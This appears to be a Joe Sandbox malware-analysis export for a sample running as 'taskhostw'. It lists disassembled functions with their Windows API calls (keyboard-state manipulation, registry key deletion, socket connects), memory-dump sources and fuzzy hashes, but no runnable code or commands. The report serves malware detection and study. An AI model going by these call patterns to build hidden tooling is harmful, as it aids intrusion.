GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00D54353
LoadStringW.USER32(00000000), ref: 00D5435A
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00D54370
LoadStringW.USER32(00000000), ref: 00D54377
_wprintf.LIBCMT ref: 00D5439D
MessageBoxW.USER32 ref: 00D543BB

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00D54398

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: cc7145f1feaff07f755fb9e0fbd63f222e46292683943c3e672c6a13513b289a
Instruction ID: 0b4b022735909cc8e47e18b116343f637b7d879abe9119cade7f2c71fa600526
Opcode Fuzzy Hash: cc7145f1feaff07f755fb9e0fbd63f222e46292683943c3e672c6a13513b289a
Instruction Fuzzy Hash: AC0167F2940308BFE7619790DD89EFA776CE708301F4005A5BB49D2151EA749EC54B71

Function 00CF2A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?), ref: 00CF2ACF
ShowWindow.USER32(FFFFFFFF,00000000), ref: 00CF2B17
ShowWindow.USER32(FFFFFFFF,00000006), ref: 00D2C39A
ShowWindow.USER32(FFFFFFFF,?), ref: 00D2C406

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 38f7b7ec0ff97b9d7fa9c4df1eaaaaab27898b749fa0aebf6d498de0e2fdc72e
Instruction ID: d33b67731d0dc37596af9549adfb7f127d8f9d27e749fc01dadbcf7506c6ea08
Opcode Fuzzy Hash: 38f7b7ec0ff97b9d7fa9c4df1eaaaaab27898b749fa0aebf6d498de0e2fdc72e
Instruction Fuzzy Hash: 98410830214B889BC7B9CB3A9C987BE7B92EB55304F18C81DE257C6660C6759D81E733

Function 00D5716F Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00D57186

Part of subcall function 00D10F36: std::exception::exception.LIBCMT ref: 00D10F6C
Part of subcall function 00D10F36: __CxxThrowException@8.LIBCMT ref: 00D10F81

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00D571BD
EnterCriticalSection.KERNEL32(?), ref: 00D571D9
_memmove.LIBCMT ref: 00D57227
_memmove.LIBCMT ref: 00D57244
LeaveCriticalSection.KERNEL32(?), ref: 00D57253
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00D57268
InterlockedExchange.KERNEL32(?,000001F6), ref: 00D57287

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: 90dab79f2aff33713385fc1b0e596ad3c67acde15ea05c672679e767dc61f325
Instruction ID: d828199bd34a55ec39cbf10b738ff9bda3c4e734cdc13ddd7b140e78468ede33
Opcode Fuzzy Hash: 90dab79f2aff33713385fc1b0e596ad3c67acde15ea05c672679e767dc61f325
Instruction Fuzzy Hash: C6317031904205EBCF20EF54ED86AAA7BB8EF45311F1441A9FD04DB246DB709E95CBB4

Function 00D76205 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00D7621D
GetDC.USER32(00000000), ref: 00D76225
GetDeviceCaps.GDI32(00000000,0000005A,?,?,00D7905C,?,?,000000FF,00000000,?,000000FF,?,00000001,?), ref: 00D76230
ReleaseDC.USER32(00000000,00000000), ref: 00D7623C
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00D76278
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00D76289
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00D762C3
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00D762E3

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 4f770240a69abc917dbc4d99042b1ce3c6abcce87f6808e3b2fe59c02340ee23
Instruction ID: 2704cbde9116b2958c1b20df64ea0bc4e36ec1362d44951eb9182a57e710278b
Opcode Fuzzy Hash: 4f770240a69abc917dbc4d99042b1ce3c6abcce87f6808e3b2fe59c02340ee23
Instruction Fuzzy Hash: 2A314F72101614BFEB214F54DC49FEA3BA9EF09751F044065FE08DA292E6759C41CB74

Function 02ADB271 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 02ADB286
_memcmp.LIBCMT ref: 02ADB2A8
_memcmp.LIBCMT ref: 02ADB2C0
_memcmp.LIBCMT ref: 02ADB2D3
_memcmp.LIBCMT ref: 02ADB2ED
_memcmp.LIBCMT ref: 02ADB300
_memcmp.LIBCMT ref: 02ADB318
_memcmp.LIBCMT ref: 02ADB333

Memory Dump Source

Source File: 00000005.00000003.362011694.0000000002A80000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true

Associated: 00000005.00000003.362011694.0000000002B33000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.362011694.0000000002B41000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_2a80000_taskhostw.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 15f0f6386b2101db337efd48204956996102700c164b9a85bc4e5a5f22c31147
Instruction ID: fb13e3011a194fe3eafc046505ee41fd314f0e294ef60092e95a6f751d936c0f
Opcode Fuzzy Hash: 15f0f6386b2101db337efd48204956996102700c164b9a85bc4e5a5f22c31147
Instruction Fuzzy Hash: 652180F26802097FAA446A119E91F7F776DAE0064CB060421FD0B97641FF64EE11C6B9

Function 00D5EBAF Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 00CF9997: __itow.LIBCMT ref: 00CF99C2
Part of subcall function 00CF9997: __swprintf.LIBCMT ref: 00CF9A0C

Part of subcall function 00D0FE06: _wcscpy.LIBCMT ref: 00D0FE29

_wcstok.LIBCMT ref: 00D5ED20
_wcscpy.LIBCMT ref: 00D5EDAF
_memset.LIBCMT ref: 00D5EDE2

Strings

X, xrefs: 00D5EE1F

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: 94445997a1724e1b783180612990e9a8f0e407e0edbe7c36fddd93cf8d93f1a3
Instruction ID: 6849fb381901f269512662a6deeecf9a7d26c07a08a14883c2229cac66847bcf
Opcode Fuzzy Hash: 94445997a1724e1b783180612990e9a8f0e407e0edbe7c36fddd93cf8d93f1a3
Instruction Fuzzy Hash: F8C17F315083049FCB64EF24C885A6AB7E4FF85310F04492DFD9A872A1DB70ED49DBA2

Function 00D66C19 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00D66D16
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00D66D37
WSAGetLastError.WSOCK32(00000000), ref: 00D66D4A
htons.WSOCK32(?,?,?,00000000,?), ref: 00D66E00
inet_ntoa.WSOCK32(?), ref: 00D66DBD

Part of subcall function 00D4ABF4: _strlen.LIBCMT ref: 00D4ABFE
Part of subcall function 00D4ABF4: _memmove.LIBCMT ref: 00D4AC20

_strlen.LIBCMT ref: 00D66E5A
_memmove.LIBCMT ref: 00D66EC3

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
String ID:
API String ID: 3619996494-0
Opcode ID: dc8e975fb67e0a83c3c7ed237246fc42f3ba90c0858478593b3c1fc18278cd80
Instruction ID: aff28edf66a892efc6447798bdacf3b7c7f01a0bbd09c85a74a7b61e99e09926
Opcode Fuzzy Hash: dc8e975fb67e0a83c3c7ed237246fc42f3ba90c0858478593b3c1fc18278cd80
Instruction Fuzzy Hash: 0C81D075104304ABD710EF24CC86F6BB7A9EF84714F14891CF6569B2A2DB71DD05CBA2

Function 02ADA596 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 249COMMON

Download Yara Rule

APIs

_wcscmp.LIBCMT ref: 02ADA5EB
_wcscmp.LIBCMT ref: 02ADA64E
_wcsstr.LIBCMT ref: 02ADA65F
_wcscmp.LIBCMT ref: 02ADA6A7
_wcscmp.LIBCMT ref: 02ADA727

Strings

@, xrefs: 02ADA5BB

Memory Dump Source

Source File: 00000005.00000003.362011694.0000000002A80000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true

Associated: 00000005.00000003.362011694.0000000002B33000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.362011694.0000000002B41000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_2a80000_taskhostw.jbxd

Similarity

API ID: _wcscmp$_wcsstr
String ID: @
API String ID: 3312506106-2766056989
Opcode ID: db69b5071b4f03b89492a660c4e426a08a7858e4c390d033fde3beadfa727160
Instruction ID: 5f8ccc6d1fe03dbd06cd4a7f9dec2b05d5935e2cf0f3e91daba2fd7544a8a232
Opcode Fuzzy Hash: db69b5071b4f03b89492a660c4e426a08a7858e4c390d033fde3beadfa727160
Instruction Fuzzy Hash: 9381A031008206DBEB15DF10C9D4FAA7BE9FF44318F048569ED8A9A096DF34D94ACBA1

Function 00D7B385 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(006A23B8), ref: 00D7B41F
IsWindowEnabled.USER32(006A23B8), ref: 00D7B42B
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00D7B50F
SendMessageW.USER32(006A23B8,000000B0,?,?), ref: 00D7B546
IsDlgButtonChecked.USER32(?,?,?,?), ref: 00D7B583
GetWindowLongW.USER32(006A23B8,000000EC), ref: 00D7B5A5
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00D7B5BD

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: fd7bc9e876bfb19115fb75daf6cf2229821f9c69f8aefe72d22651953e8b0522
Instruction ID: bc8eaf0c5fe2aff5f32ac605a34e76f8a658dc161af8dd1619e089e17d22936c
Opcode Fuzzy Hash: fd7bc9e876bfb19115fb75daf6cf2229821f9c69f8aefe72d22651953e8b0522
Instruction Fuzzy Hash: 7B717034601204EFDF219F64D895FAA7BA5FF09328F58846AE95D97362E731AD40CB30

Function 00D5127E Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00D512BD
GetKeyboardState.USER32(?), ref: 00D512D2
SetKeyboardState.USER32(?), ref: 00D51333
PostMessageW.USER32 ref: 00D51361
PostMessageW.USER32 ref: 00D51380
PostMessageW.USER32 ref: 00D513C6
PostMessageW.USER32 ref: 00D513E9

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 35f1618fb74ee6f93dfa0b1eed35638572a51d0a7af737f6517ea3e64a88646d
Instruction ID: 949ec67d5ee835813c33cb90d000da987722228cd34e8d84b70d5ec29c9ef6fe
Opcode Fuzzy Hash: 35f1618fb74ee6f93dfa0b1eed35638572a51d0a7af737f6517ea3e64a88646d
Instruction Fuzzy Hash: 5851B1A4A087D53DFF3646248C55BBA7EA96B06306F0C4589ECD9958C2D2D8ACCCD770

Function 00D51097 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00D510D6
GetKeyboardState.USER32(?), ref: 00D510EB
SetKeyboardState.USER32(?), ref: 00D5114C
PostMessageW.USER32 ref: 00D51178
PostMessageW.USER32 ref: 00D51195
PostMessageW.USER32 ref: 00D511D9
PostMessageW.USER32 ref: 00D511FA

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: e72e3fae2e0e9779635df9b02fbf6ac75846f31245857b21c0b0bddb0317868d
Instruction ID: b9aa7ce879c52918705abcc349b3024cfba0965c438f97c8a73454f772dca5a7
Opcode Fuzzy Hash: e72e3fae2e0e9779635df9b02fbf6ac75846f31245857b21c0b0bddb0317868d
Instruction Fuzzy Hash: A451E4A4504BD63DFF3287648C45F7ABEA99B06301F0C8589EDD9868C2D694ACCCD774

Function 00D772C3 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00D772DC
GetMenuItemInfoW.USER32 ref: 00D77383
IsMenu.USER32(?), ref: 00D7739B
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00D773E3
DrawMenuBar.USER32 ref: 00D773F6

Strings

0, xrefs: 00D772D0

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: 6f5810cdc3e5e85c9032656d65ccccef7b9fc90459b3796645fcf21e5e9dc36e
Instruction ID: afe5085f41746d473b3e85af30b02b70f7268a1056ed9699fb14af9ac61cdd44
Opcode Fuzzy Hash: 6f5810cdc3e5e85c9032656d65ccccef7b9fc90459b3796645fcf21e5e9dc36e
Instruction Fuzzy Hash: CE413975A04208EFDB20DF50E884E9ABBF8FB04318F048569ED5997360E731AD50DFA0

Function 00D7102D Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00D7105C
RegOpenKeyExW.ADVAPI32 ref: 00D71086
FreeLibrary.KERNEL32(00000000), ref: 00D7113D

Part of subcall function 00D7102D: RegCloseKey.ADVAPI32(?), ref: 00D710A3
Part of subcall function 00D7102D: FreeLibrary.KERNEL32(?), ref: 00D710F5
Part of subcall function 00D7102D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00D71118

RegDeleteKeyW.ADVAPI32(?,?), ref: 00D710E0

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: 6e3f06d3b75ce119183198430d354c8c93d1af84fce1339107552fadab711282
Instruction ID: 52b55d8b05b1641069fe2ef772a01d29ba0b28872f632ca882b337dfa86c7652
Opcode Fuzzy Hash: 6e3f06d3b75ce119183198430d354c8c93d1af84fce1339107552fadab711282
Instruction Fuzzy Hash: 67314175901219BFDB14DF94DC85AFEB7BCEF08340F444269E909E2241EA709E859AB0

Function 00D762FF Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00D7631E
GetWindowLongW.USER32(006A23B8,000000F0), ref: 00D76351
GetWindowLongW.USER32(006A23B8,000000F0), ref: 00D76386
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00D763B8
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00D763E2
GetWindowLongW.USER32(00000000,000000F0), ref: 00D763F3
SetWindowLongW.USER32(00000000,000000F0,00000000,?,?,?,00D79E6E,?,?,?,?), ref: 00D7640D

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 084f966817e944e635fa6bbb0cff656a8195075f7f4e4514d59f1d2799eb596f
Instruction ID: 08ea6f14ddefbaed0daa1a1c0c97e83f31bb662bd346be95a43c4140ec265b60
Opcode Fuzzy Hash: 084f966817e944e635fa6bbb0cff656a8195075f7f4e4514d59f1d2799eb596f
Instruction Fuzzy Hash: ED31F134604650DFEB219F18EC84F5937E1FB4A714F1981A4F518CB2B6EB62E880DB61

Function 00D66289 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00D67EA0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00D67ECB

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00D662DC
WSAGetLastError.WSOCK32(00000000), ref: 00D662EB
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00D66324
connect.WSOCK32(00000000,?,00000010), ref: 00D6632D
WSAGetLastError.WSOCK32 ref: 00D66337
closesocket.WSOCK32(00000000), ref: 00D66360
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00D66379

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: 64622ebfba352e8999630446da1733833058ae48b3d025b5547d6d02c22d4a63
Instruction ID: 8d47b99b1c827104f4ae5e805b77ba312643241f87978647442bd8eb8a121b83
Opcode Fuzzy Hash: 64622ebfba352e8999630446da1733833058ae48b3d025b5547d6d02c22d4a63
Instruction Fuzzy Hash: 29319171600218AFDB109F64CC85BBE7BA9EF44764F084069FA4AD7391DB70ED449BB2

Function 00D14109 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00D141D2,?), ref: 00D14123
GetProcAddress.KERNEL32(00000000), ref: 00D1412A
EncodePointer.KERNEL32(00000000), ref: 00D14136
DecodePointer.KERNEL32(00000001,00D141D2,?), ref: 00D14153

Strings

RoInitialize, xrefs: 00D14112
combase.dll, xrefs: 00D1411E

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 3489934621-340411864
Opcode ID: 252b73786f8a610fc3b224f0403e06d650372a564e33f3bb8fcb74d1d841fbf2
Instruction ID: 623f812a3ad898cb3d572af763e1a1b00e8c4d08eeba0755d76c337129dce2eb
Opcode Fuzzy Hash: 252b73786f8a610fc3b224f0403e06d650372a564e33f3bb8fcb74d1d841fbf2
Instruction Fuzzy Hash: D8E01A70A90300FFEB206B7AEC09B543AA8BB16B42F508524F505D52B0EBB551C4AF30

Function 00D141DE Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00D140F8), ref: 00D141F8
GetProcAddress.KERNEL32(00000000), ref: 00D141FF
EncodePointer.KERNEL32(00000000), ref: 00D1420A
DecodePointer.KERNEL32(00D140F8), ref: 00D14225

Strings

combase.dll, xrefs: 00D141F3
RoUninitialize, xrefs: 00D141E7

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
